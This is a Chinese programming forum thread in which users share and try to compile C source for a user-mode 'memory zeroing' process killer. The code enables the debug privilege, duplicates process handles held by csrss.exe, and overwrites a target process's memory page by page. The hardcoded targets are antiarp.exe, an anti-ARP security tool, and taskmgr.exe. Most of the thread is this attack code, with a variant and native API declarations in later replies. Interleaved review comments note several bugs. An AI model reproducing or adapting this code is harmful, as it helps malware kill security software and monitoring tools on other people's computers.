RING3下内存清零法杀进程

Topsupper 2011-07-13 12:01:17
我在编译网上的这个例子,提示缺少RootKit.h头文件,请问谁有啊,在哪里可以下载到啊。
下面是其源代码:
/*************************************************************************
* 学习者: sudami
* 时间: 07/12/24
*
* 备注: 学习RING3下通过内存清零结束大部分进程的方法.思路如下:
*
* 遍历所有进程[隐藏进程暂时不在考虑之内]获得csrss.exe的PID,ZwOpenProcess得到其句柄-->
* 为ZwQuerySystemInformation 函数传递16号参数.获得系统句柄信息 -->
* 几乎系统所有的HANDLE结构体中,里面的ProcessId都是指向csrss.exe的,遍历每个进程-->
* 调用ZwDuplicateObject复制此进程的句柄表,ZwQueryInformationProcess得到
* PROCESS_BASIC_INFORMATION结构信息; 判断其中的UniqueProcessId是否和指定的PID相同-->
* 若相同,则向指定进程中写入垃圾数据,使进程死掉; 若不同,继续遍历.
*
*************************************************************************/

#include <windows.h>
#include <Ntsecapi.h>
#include <Aclapi.h>
#include <tlhelp32.h>
#include "G:\sudamiDriver\RootKit.h"

//////////////////////////////////////////////////////////////////////////

#pragma comment (lib,"ntdll.lib")
#pragma comment (lib, "Kernel32.lib")
#pragma comment (lib, "Advapi32.lib")
#pragma comment (linker, "/subsystem:windows")
#pragma comment (linker, "/ENTRY:main")

//------------------------------------------------------------------

// Forward declarations for the helpers defined later in this file.
// Looks up a process ID by executable name; returns 0 when nothing matches.
DWORD GetPidByName (char *szName);
// Overwrites the address range of the process with the given PID (see definition).
void KillProcess (ULONG dwProcessId);
// Enables or disables one named privilege on the supplied token handle.
BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable);


//////////////////////////////////////////////////////////////////////////
// 主函数入口
//
// Program entry point (the linker pragma above also names it via /ENTRY:main).
// Requests SE_DEBUG_NAME for the current process, looks up "antiarp.exe" by
// name and passes its PID to KillProcess; shows a message box when no such
// process is running.
// NOTE(review): the results of OpenProcessToken and EnablePrivilege are not
// checked, and the token handle is never closed.
void main()
{
    HANDLE hProcToken;
    ULONG targetPid;

    // The debug privilege is requested before any other process is opened.
    OpenProcessToken (GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hProcToken);
    EnablePrivilege (hProcToken, SE_DEBUG_NAME, TRUE);

    targetPid = GetPidByName("antiarp.exe");
    if (targetPid == 0) {
        MessageBox (NULL, TEXT("The process is not exit,please check out."), TEXT("!"), MB_OK);
        return;
    }

    KillProcess (targetPid);
}

/////////////////////////////////////////////////////////////////////////
//-----------------------------------------------------------------------
// 函数名: GetPidByName
//
// 参数: char *szName
// --> 进程名
//
// 返回值: 指定进程的PID
//
// 功能: 通过CreateToolhelp32Snapshot函数遍历进程,找到指定进程的PID
// 对RootKit基本无用
//
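/**
 * Find the process ID of the first process in a Toolhelp32 snapshot whose
 * executable name equals szName (case-insensitive, compared with lstrcmpi).
 *
 * Only the first match is returned, so when several processes share the same
 * image name the caller cannot choose between them. The match is by name
 * only; nothing here verifies what the process actually is.
 *
 * @param szName  Executable file name to look for, e.g. "csrss.exe".
 * @return The matching process ID, or 0 when the snapshot cannot be taken or
 *         enumerated, or when no process matches.
 */
DWORD GetPidByName (char *szName)
{
    PROCESSENTRY32 pe32 = {0};
    DWORD dwRet = 0;
    HANDLE hProcessSnap;

    hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hProcessSnap == INVALID_HANDLE_VALUE) {
        return 0;
    }

    // dwSize must be filled in before the first Process32First call.
    pe32.dwSize = sizeof(PROCESSENTRY32);

    if (Process32First (hProcessSnap, &pe32)) {
        do {
            if (lstrcmpi(szName, pe32.szExeFile) == 0) {
                dwRet = pe32.th32ProcessID;
                break;
            }
        } while (Process32Next(hProcessSnap, &pe32));
    }

    // Close the snapshot on every path. The original returned straight away
    // when Process32First failed and leaked the snapshot handle.
    CloseHandle(hProcessSnap);

    return dwRet;
}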


/////////////////////////////////////////////////////////////////////////
//-----------------------------------------------------------------------
// 函数名: KillProcess
//
// 参数: ULONG dwProcessId
// --> 进程ID
//
// 返回值: NULL
//
// 功能: 向指定的进程空间填充垃圾信息.使进程死掉
//
// Overwrites the memory of the process identified by dwProcessId.
//
// Steps, as written: open csrss.exe with PROCESS_ALL_ACCESS, read the system
// handle table, duplicate handles owned by csrss.exe into this process until
// one refers to dwProcessId, then make each 0x1000-byte page in the range
// 0x1000..0x80000000 writable and write the contents of buf over it.
//
// Returns nothing and reports no status; no native call result is checked
// except the two compared against STATUS_SUCCESS below.
//
// NOTE(review): for defenders, the behaviour visible here is a full-access
// open of csrss.exe, a system handle-table query, handle duplication out of
// csrss.exe, and cross-process protect/write calls on the duplicated handle.
// Presumably the routine does nothing useful where csrss.exe cannot be opened
// with PROCESS_ALL_ACCESS -- confirm on the OS version of interest.
void KillProcess (ULONG dwProcessId)
{
HMODULE hNTDLL = GetModuleHandle("ntdll.dll");
HANDLE ph, h_dup;

PSYSTEM_HANDLE_INFORMATION h_info;
PROCESS_BASIC_INFORMATION pbi;

// Get the PID of csrss.exe (first process with that image name; 0 if none).
HANDLE csrss_id = (HANDLE) GetPidByName ("csrss.exe");
CLIENT_ID client_id;
client_id.UniqueProcess = csrss_id;
client_id.UniqueThread = 0;

// Initialise the object attributes structure (all optional fields empty).
OBJECT_ATTRIBUTES attr;
attr.Length = sizeof(OBJECT_ATTRIBUTES);
attr.RootDirectory = 0;
attr.ObjectName = 0;
attr.Attributes = 0;
attr.SecurityDescriptor = 0;
attr.SecurityQualityOfService = 0;


////////////////////////////////////////////////////////////////////////////////////
// Resolve the native API entry points from ntdll.dll at run time.
// NOTE(review): none of the returned pointers is checked for NULL before use.

ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation =
(ZWQUERYSYSTEMINFORMATION) GetProcAddress (hNTDLL, "ZwQuerySystemInformation");

ZWOPENPROCESS ZwOpenProcess =
(ZWOPENPROCESS) GetProcAddress (hNTDLL, "ZwOpenProcess");

ZWDUPLICATEOBJECT ZwDuplicateObject =
(ZWDUPLICATEOBJECT) GetProcAddress (hNTDLL, "ZwDuplicateObject");

ZWQUERYINFORMATIONPROCESS ZwQueryInformationProcess =
(ZWQUERYINFORMATIONPROCESS) GetProcAddress (hNTDLL, "ZwQueryInformationProcess");

ZWALLOCATEVIRTUALMEMORY ZwAllocateVirtualMemory =
(ZWALLOCATEVIRTUALMEMORY) GetProcAddress (hNTDLL, "ZwAllocateVirtualMemory");

ZWPROTECTVIRTUALMEMORY ZwProtectVirtualMemory =
(ZWPROTECTVIRTUALMEMORY) GetProcAddress (hNTDLL, "ZwProtectVirtualMemory");

ZWWRITEVIRTUALMEMORY ZwWriteVirtualMemory =
(ZWWRITEVIRTUALMEMORY) GetProcAddress (hNTDLL, "ZwWriteVirtualMemory");

ZWFREEVIRTUALMEMORY ZwFreeVirtualMemory =
(ZWFREEVIRTUALMEMORY) GetProcAddress (GetModuleHandle("ntdll.dll"), "ZwFreeVirtualMemory");

ZWCLOSE ZwClose =
(ZWCLOSE) GetProcAddress (hNTDLL, "ZwClose");

////////////////////////////////////////////////////////////////////////////////////


// Open csrss.exe and obtain a handle to it.
// NOTE(review): the status is ignored, so ph is indeterminate if the open fails;
// ph is also never closed.
ZwOpenProcess (&ph, PROCESS_ALL_ACCESS, &attr, &client_id);

ULONG bytesIO = 0x400000;
PVOID buf = 0;

// Commit a 0x400000-byte read/write buffer in the current process.
ZwAllocateVirtualMemory (GetCurrentProcess(), &buf, 0, &bytesIO, MEM_COMMIT, PAGE_READWRITE);

// Call ZwQuerySystemInformation with information class 16 (SystemHandleInformation);
// the system handle information is stored in buf.
// The start of buf holds the number of system handles; the entries begin at offset 4.
ZwQuerySystemInformation (SystemHandleInformation, buf, 0x400000, &bytesIO);
// NOTE(review): this converts the address held in buf to ULONG; it does not read
// the value stored at that address, so the loop bound below is not the count the
// comment above describes.
ULONG NumOfHandle = (ULONG) buf;
// The pointer-to-ULONG cast assumes pointers fit in 32 bits.
h_info = (PSYSTEM_HANDLE_INFORMATION)((ULONG)buf+4);

for (ULONG i= 0 ; i<NumOfHandle; i++, h_info++)
{
// Only entries owned by csrss.exe with object type number 5 are considered.
// presumably 5 is the process object type on the author's system -- TODO confirm
if ((h_info->ProcessId == (ULONG)csrss_id) && (h_info->ObjectTypeNumber == 5))
{
// Duplicate the handle from csrss.exe (ph) into this process;
// (HANDLE)-1 is the current-process pseudo-handle.
if (ZwDuplicateObject(
ph,
(PHANDLE)h_info->Handle,
(HANDLE)-1,
&h_dup,
0,
0,
DUPLICATE_SAME_ACCESS) == STATUS_SUCCESS) {

// Information class 0 (ProcessBasicInformation) fills pbi for the duplicated handle.
ZwQueryInformationProcess(h_dup, 0, &pbi, sizeof(pbi), &bytesIO);
}


// NOTE(review): pbi is read even when the duplication above failed, in which
// case it holds whatever an earlier iteration left there, or nothing at all.
if (pbi.UniqueProcessId == dwProcessId)
{
MessageBox(0, "目标已确定!", "!", MB_OK);

// Reuses the outer loop variable i as the page address; the outer loop
// is left with break afterwards, so its counter is not needed again.
for (i = 0x1000; i < 0x80000000; i = i + 0x1000)
{
PVOID pAddress = (PVOID) i;
ULONG sz = 0x1000;
ULONG oldp;

// Pages whose protection cannot be changed are skipped; for the rest,
// 0x1000 bytes from the start of buf are written over the page.
if (ZwProtectVirtualMemory (h_dup, &pAddress, &sz, PAGE_EXECUTE_READWRITE, &oldp) == STATUS_SUCCESS) {
ZwWriteVirtualMemory(h_dup, pAddress, buf, 0x1000, &oldp);
}
}

MessageBox(0, "任务已完成!","!", 0);
// The close call is commented out, so h_dup is left open here; handles
// duplicated in earlier iterations are not closed either.
// ZwClose(h_dup);
break;
}
}
}

// Release the local buffer (size 0 with MEM_RELEASE frees the whole region).
bytesIO = 0;
ZwFreeVirtualMemory(GetCurrentProcess(), &buf, &bytesIO, MEM_RELEASE);
}


/////////////////////////////////////////////////////////////////////////
//-----------------------------------------------------------------------
// 函数名: EnablePrivilege
//
// 参数: HANDLE hToken ---> 进程句柄
// LPCTSTR szPrivName --->
// BOOL fEnable --->
//
// 返回值: TRUE | FALSE
//
// 功能: 提升当前进程到指定的特权级
//
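/**
 * Enable or disable a single named privilege on an access token.
 *
 * @param hToken      Access-token handle; the caller in this file obtains it
 *                    from OpenProcessToken with TOKEN_ADJUST_PRIVILEGES.
 * @param szPrivName  Privilege name, e.g. SE_DEBUG_NAME.
 * @param fEnable     TRUE to enable the privilege, FALSE to disable it.
 * @return TRUE only when the privilege name resolved and the adjustment left
 *         GetLastError() == ERROR_SUCCESS; FALSE otherwise.
 */
BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable)
{
    TOKEN_PRIVILEGES tp;

    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes = fEnable ? SE_PRIVILEGE_ENABLED : 0;

    // The original ignored this result, so a failed lookup left Luid
    // uninitialized and it was still handed to AdjustTokenPrivileges.
    if (!LookupPrivilegeValue (NULL, szPrivName, &tp.Privileges[0].Luid)) {
        return FALSE;
    }

    if (!AdjustTokenPrivileges (hToken, FALSE, &tp, sizeof(tp), NULL, NULL)) {
        return FALSE;
    }

    // AdjustTokenPrivileges can succeed without assigning the privilege
    // (ERROR_NOT_ALL_ASSIGNED), so the last-error value decides the result.
    return (GetLastError() == ERROR_SUCCESS);
}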

/////////////////////////////// END OF FILE /////////////////////////////////////
liu3zy 2013-02-28
//------------------ End of native API declarations ------------------//
//------------------ Program proper starts here ------------------//

// Returns the PID of the first process in a Toolhelp32 snapshot whose image
// name equals szName (case-insensitive), or 0 when none is found.
DWORD GetPidByName(char *szName)
{
    HANDLE hProcessSnap = INVALID_HANDLE_VALUE;
    PROCESSENTRY32 pe32={0};
    DWORD dwRet=0;

    hProcessSnap =CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if(hProcessSnap == INVALID_HANDLE_VALUE)
        return 0;

    pe32.dwSize = sizeof(PROCESSENTRY32);
    if(Process32First(hProcessSnap, &pe32))
    {
        do
        {
            if(lstrcmpi(szName,pe32.szExeFile)==0)
            {
                dwRet=pe32.th32ProcessID;
                break;
            }
        } while (Process32Next(hProcessSnap,&pe32));
    }
    else
        return 0;   // NOTE(review): the snapshot handle is not closed on this path

    if(hProcessSnap !=INVALID_HANDLE_VALUE)
        CloseHandle(hProcessSnap);
    return dwRet;
}

/////////////////////////////////////////////////////////////////////////
//-----------------------------------------------------------------------
// Function: KillProcess
//
// Parameter: ULONG dwProcessId
//            --> process ID
//
// Returns: nothing
//
// Purpose: fills the address space of the given process with junk data so
//          that the process dies
//
void KillProcess (ULONG dwProcessId)
{
    HMODULE hNTDLL = LoadLibrary ("ntdll");
    HANDLE ph, h_dup;
    ULONG bytesIO;
    PVOID buf;
    ULONG i;
    CLIENT_ID cid1;
    OBJECT_ATTRIBUTES attr;
    HANDLE csrss_id;
    PROCESS_BASIC_INFORMATION pbi;
    PVOID p0, p1;
    ULONG sz, oldp;
    ULONG NumOfHandle;
    PSYSTEM_HANDLE_INFORMATION h_info;

    HMODULE hNtDll = ::GetModuleHandle( "ntdll.dll" );
    if( hNtDll == NULL )
        return ;

    ////////////////////////////////////////////////////////////////////////////////////
    // Resolve the real addresses of these functions
    // functions ++
    // ZwQuerySystemInformation
    ZwQuerySystemInformation = (PNtZwQuerySystemInformation)GetProcAddress( hNtDll,"ZwQuerySystemInformation" );
    if( ZwQuerySystemInformation == NULL )
        return ;
    // ZwOpenProcess
    ZwOpenProcess = (PNtZwOpenProcess)GetProcAddress( hNtDll,"ZwOpenProcess" );
    if( ZwOpenProcess == NULL )
        return ;
    // ZwAllocateVirtualMemory
    ZwAllocateVirtualMemory = (PNtZwAllocateVirtualMemory)GetProcAddress( hNtDll,"ZwAllocateVirtualMemory" );
    if( ZwAllocateVirtualMemory == NULL )
        return ;
    // ZwDuplicateObject
    ZwDuplicateObject = (PNtZwDuplicateObject)GetProcAddress( hNtDll,"ZwDuplicateObject" );
    if( ZwDuplicateObject == NULL )
        return ;
    // ZwQueryInformationProcess
    ZwQueryInformationProcess = (PNtZwQueryInformationProcess)GetProcAddress( hNtDll,"ZwQueryInformationProcess" );
    if( ZwQueryInformationProcess == NULL )
        return ;
    // ZwProtectVirtualMemory
    ZwProtectVirtualMemory = (PNtZwProtectVirtualMemory)GetProcAddress( hNtDll,"ZwProtectVirtualMemory" );
    if( ZwProtectVirtualMemory == NULL )
        return ;
    // ZwWriteVirtualMemory
    ZwWriteVirtualMemory = (PNtZwWriteVirtualMemory)GetProcAddress( hNtDll,"ZwWriteVirtualMemory" );
    if( ZwWriteVirtualMemory == NULL )
        return ;
    // ZwClose
    ZwClose = (PNtZwClose)GetProcAddress( hNtDll,"ZwClose" );
    if( ZwClose == NULL )
        return ;
    // ZwFreeVirtualMemory
    ZwFreeVirtualMemory = (PNtZwFreeVirtualMemory)GetProcAddress( hNtDll,"ZwFreeVirtualMemory" );
    if( ZwFreeVirtualMemory == NULL )
        return ;
    ////////////////////////////////////////////////////////////////////////////////////

    // Get the PID of csrss.exe
    csrss_id = (HANDLE) GetPidByName ("csrss.exe");
    CLIENT_ID client_id;
    client_id.UniqueProcess = csrss_id;
    client_id.UniqueThread = 0;

    // Initialise the object attributes structure
    attr.Length = sizeof(OBJECT_ATTRIBUTES);
    attr.RootDirectory = 0;
    attr.ObjectName = 0;
    attr.Attributes = 0;
    attr.SecurityDescriptor = 0;
    attr.SecurityQualityOfService = 0;

    // Open csrss.exe and obtain a handle to it (status is not checked)
    ZwOpenProcess (&ph, PROCESS_ALL_ACCESS, &attr, &client_id);

    bytesIO = 0x400000;
    buf = 0;
    ZwAllocateVirtualMemory (GetCurrentProcess(), &buf, 0, &bytesIO, MEM_COMMIT, PAGE_READWRITE);

    // Call ZwQuerySystemInformation with information class 16; the system
    // handle information is stored in buf.
    // The start of buf holds the number of system handles; entries begin at offset 4.
    ZwQuerySystemInformation (SystemHandleInformation, buf, 0x400000, &bytesIO);
    // NOTE(review): this takes the numeric value of the pointer buf, not the
    // value stored in the buffer.
    NumOfHandle = (ULONG) buf;
    h_info = (PSYSTEM_HANDLE_INFORMATION)((ULONG)buf+4);

    // This declaration shadows the function-level i declared above.
    for (ULONG i= 0 ; i<NumOfHandle; i++, h_info++)
    {
        if ((h_info->ProcessId == (ULONG)csrss_id) && (h_info->ObjectTypeNumber == 5))
        {
            // Duplicate the handle into the current process
            if (ZwDuplicateObject( ph,(PHANDLE)h_info->Handle,(HANDLE)-1, &h_dup, 0, 0, DUPLICATE_SAME_ACCESS) == STATUS_SUCCESS)
            {
                ZwQueryInformationProcess(h_dup, 0, &pbi, sizeof(pbi), &bytesIO);
            }

            // NOTE(review): pbi is read even when the duplication failed.
            if (pbi.UniqueProcessId == dwProcessId)
            {
                MessageBox(0, "目标已确定!", "!", MB_OK);

                // Page-by-page pass over 0x1000..0x80000000, reusing i.
                for (i = 0x1000; i < 0x80000000; i = i + 0x1000)
                {
                    PVOID pAddress = (PVOID) i;
                    ULONG sz = 0x1000;
                    ULONG oldp;
                    if (ZwProtectVirtualMemory (h_dup, &pAddress, &sz, PAGE_EXECUTE_READWRITE, &oldp) == STATUS_SUCCESS)
                    {
                        ZwWriteVirtualMemory(h_dup, pAddress, buf, 0x1000, &oldp);
                    }
                }

                MessageBox(0, "任务已完成!","!", 0);
                // ZwClose(h_dup);
                break;
            }
        }
    }

    bytesIO = 0;
    ZwFreeVirtualMemory(GetCurrentProcess(), &buf, &bytesIO, MEM_RELEASE);
}

// Enables or disables one named privilege on the token hToken; the result is
// taken from GetLastError() after AdjustTokenPrivileges.
BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable)
{
    TOKEN_PRIVILEGES tp;
    tp.PrivilegeCount = 1;
    LookupPrivilegeValue(NULL,szPrivName,&tp.Privileges[0].Luid);
    tp.Privileges[0].Attributes = fEnable ? SE_PRIVILEGE_ENABLED:0;
    AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL,NULL);
    return((GetLastError() == ERROR_SUCCESS));
}

// Entry point: requests SE_DEBUG_NAME, then passes the PID of "taskmgr.exe"
// (when one is running) to KillProcess and exits.
void main()
{
    ULONG Pid;
    HANDLE hToken;

    OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken);
    EnablePrivilege(hToken,SE_DEBUG_NAME,TRUE);

    if (Pid = GetPidByName("taskmgr.exe"))
    {
        KillProcess(Pid);
    }
    ExitProcess(0);
}
liu3zy 2013-02-28
// My test code follows. Note: on Win7 it seems to compile and then fail when run.
#include <Windows.h>
#include <Ntsecapi.h>
#include <Aclapi.h>
#include <tlhelp32.h>

#pragma comment (lib,"ntdll.lib") // Copy From DDK
#pragma comment (lib,"Kernel32.lib")
#pragma comment (lib,"Advapi32.lib")
#pragma comment(linker, "/ENTRY:main")

#ifndef ULONG_PTR
#define ULONG_PTR unsigned long
#endif

//------------------ Data type declarations: begin --------------------//
// Hand-written copies of native structures.
// NOTE(review): several fields are fixed at 32 bits (ULONG PebBaseAddress,
// USHORT Handle), so the layouts presumably match a 32-bit system only --
// confirm against the target OS.
typedef struct _PROCESS_BASIC_INFORMATION {
    NTSTATUS ExitStatus;
    ULONG PebBaseAddress;
    ULONG_PTR AffinityMask;
    LONG BasePriority;
    ULONG_PTR UniqueProcessId;
    ULONG_PTR InheritedFromUniqueProcessId;
} PROCESS_BASIC_INFORMATION;
typedef PROCESS_BASIC_INFORMATION *PPROCESS_BASIC_INFORMATION;

typedef struct _SYSTEM_HANDLE_INFORMATION {
    ULONG ProcessId;
    UCHAR ObjectTypeNumber;
    UCHAR Flags;
    USHORT Handle;
    PVOID Object;
    ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;

typedef struct _SYSTEM_MODULE_INFORMATION {
    ULONG Reserved[2];
    PVOID Base;
    ULONG Size;
    ULONG Flags;
    USHORT Index;
    USHORT Unknown;
    USHORT LoadCount;
    USHORT ModuleNameOffset;
    CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

typedef enum _SECTION_INHERIT {
    ViewShare = 1,
    ViewUnmap = 2
} SECTION_INHERIT;

typedef struct _MY_PROCESS_INFO {
    ULONG PID;
    ULONG KPEB;
    ULONG CR3;
    CHAR Name[16];
    ULONG Reserved;
} MY_PROCESS_INFO, *PMY_PROCESS_INFO;

typedef struct _CLIENT_ID {
    HANDLE UniqueProcess;
    HANDLE UniqueThread;
} CLIENT_ID;
typedef CLIENT_ID *PCLIENT_ID;

typedef long NTSTATUS;
//------------------ Data type declarations: end --------------------//

//--------------------- Predefined constants: begin -----------------------//
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define STATUS_SUCCESS 0x00000000
#define STATUS_UNSUCCESSFUL 0xC0000001
#define STATUS_NOT_IMPLEMENTED 0xC0000002
#define STATUS_INFO_LENGTH_MISMATCH 0xC0000004
//#define STATUS_INVALID_PARAMETER 0xC000000D
#define STATUS_ACCESS_DENIED 0xC0000022
#define STATUS_BUFFER_TOO_SMALL 0xC0000023
#define OBJ_KERNEL_HANDLE 0x00000200
#define SystemModuleInformation 11
#define SystemHandleInformation 0x10
#define InitializeObjectAttributes( p, n, a, r, s ) { \
    (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \
    (p)->RootDirectory = r; \
    (p)->Attributes = a; \
    (p)->ObjectName = n; \
    (p)->SecurityDescriptor = s; \
    (p)->SecurityQualityOfService = NULL; \
    }
//--------------------- Predefined constants: end -----------------------//

//------------------ Native API declarations: begin ------------------//
// Each entry keeps the reference prototype in a comment, followed by the
// function-pointer type and a global pointer that is filled in at run time.

/*
NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation(
    ULONG SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength );
*/
typedef NTSTATUS (NTAPI* PNtZwQuerySystemInformation) (ULONG, PVOID, ULONG, PULONG);
PNtZwQuerySystemInformation ZwQuerySystemInformation;

/*
NTSYSAPI NTSTATUS NTAPI ZwOpenProcess(
    OUT PHANDLE ProcessHandle,
    IN ACCESS_MASK AccessMask,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    IN PCLIENT_ID ClientId );
*/
typedef NTSTATUS (NTAPI* PNtZwOpenProcess) (OUT PHANDLE, IN ACCESS_MASK, IN POBJECT_ATTRIBUTES, IN PCLIENT_ID);
PNtZwOpenProcess ZwOpenProcess;

/*
NTSYSAPI NTSTATUS NTAPI ZwAllocateVirtualMemory(
    IN HANDLE ProcessHandle,
    IN OUT PVOID *BaseAddress,
    IN ULONG ZeroBits,
    IN OUT PULONG RegionSize,
    IN ULONG AllocationType,
    IN ULONG Protect );
*/
typedef NTSTATUS (NTAPI* PNtZwAllocateVirtualMemory) (IN HANDLE, IN OUT PVOID, IN ULONG, IN OUT PULONG, IN ULONG, IN ULONG);
PNtZwAllocateVirtualMemory ZwAllocateVirtualMemory;

/*
NTSYSAPI NTSTATUS NTAPI ZwDuplicateObject(
    IN HANDLE SourceProcessHandle,
    IN PHANDLE SourceHandle,
    IN HANDLE TargetProcessHandle,
    OUT PHANDLE TargetHandle,
    IN ACCESS_MASK DesiredAccess OPTIONAL,
    IN BOOLEAN InheritHandle,
    IN ULONG Options );
*/
typedef NTSTATUS (NTAPI* PNtZwDuplicateObject) ( IN HANDLE, IN PHANDLE, IN HANDLE, OUT PHANDLE, IN ACCESS_MASK, IN BOOLEAN, IN ULONG);
PNtZwDuplicateObject ZwDuplicateObject;

/*
NTSYSAPI NTSTATUS NTAPI ZwQueryInformationProcess(
    IN HANDLE ProcessHandle,
    IN PVOID ProcessInformationClass,
    OUT PVOID ProcessInformation,
    IN ULONG ProcessInformationLength,
    OUT PULONG ReturnLength );
*/
typedef NTSTATUS(NTAPI* PNtZwQueryInformationProcess)(IN HANDLE, IN PVOID, OUT PVOID, IN ULONG, OUT PULONG );
PNtZwQueryInformationProcess ZwQueryInformationProcess;

/*
NTSYSAPI NTSTATUS NTAPI ZwProtectVirtualMemory(
    IN HANDLE ProcessHandle,
    IN OUT PVOID *BaseAddress,
    IN OUT PULONG NumberOfBytesToProtect,
    IN ULONG NewAccessProtection,
    OUT PULONG OldAccessProtection );
*/
typedef NTSTATUS (NTAPI* PNtZwProtectVirtualMemory) (IN HANDLE, IN OUT PVOID, IN OUT PULONG, IN ULONG , OUT PULONG);
PNtZwProtectVirtualMemory ZwProtectVirtualMemory;

/*
NTSYSAPI NTSTATUS NTAPI ZwWriteVirtualMemory(
    IN HANDLE ProcessHandle,
    IN PVOID BaseAddress,
    IN PVOID Buffer,
    IN ULONG NumberOfBytesToWrite,
    OUT PULONG NumberOfBytesWritten OPTIONAL );
*/
typedef NTSTATUS (NTAPI *PNtZwWriteVirtualMemory) ( IN HANDLE, IN PVOID, IN PVOID, IN ULONG, OUT PULONG );
PNtZwWriteVirtualMemory ZwWriteVirtualMemory;

/*
NTSYSAPI NTSTATUS NTAPI ZwClose(
    IN HANDLE ObjectHandle );
*/
typedef NTSTATUS (NTAPI *PNtZwClose) ( IN HANDLE );
PNtZwClose ZwClose;

/*
NTSYSAPI NTSTATUS NTAPI ZwFreeVirtualMemory(
    IN HANDLE ProcessHandle,
    IN PVOID *BaseAddress,
    IN OUT PULONG RegionSize,
    IN ULONG FreeType );
*/
typedef NTSTATUS (NTAPI *PNtZwFreeVirtualMemory)( IN HANDLE, IN PVOID, IN OUT PULONG, IN ULONG );
PNtZwFreeVirtualMemory ZwFreeVirtualMemory;
c_losed 2011-07-13
1.网上下载
2.找sudami要
ouyh12345 2011-07-13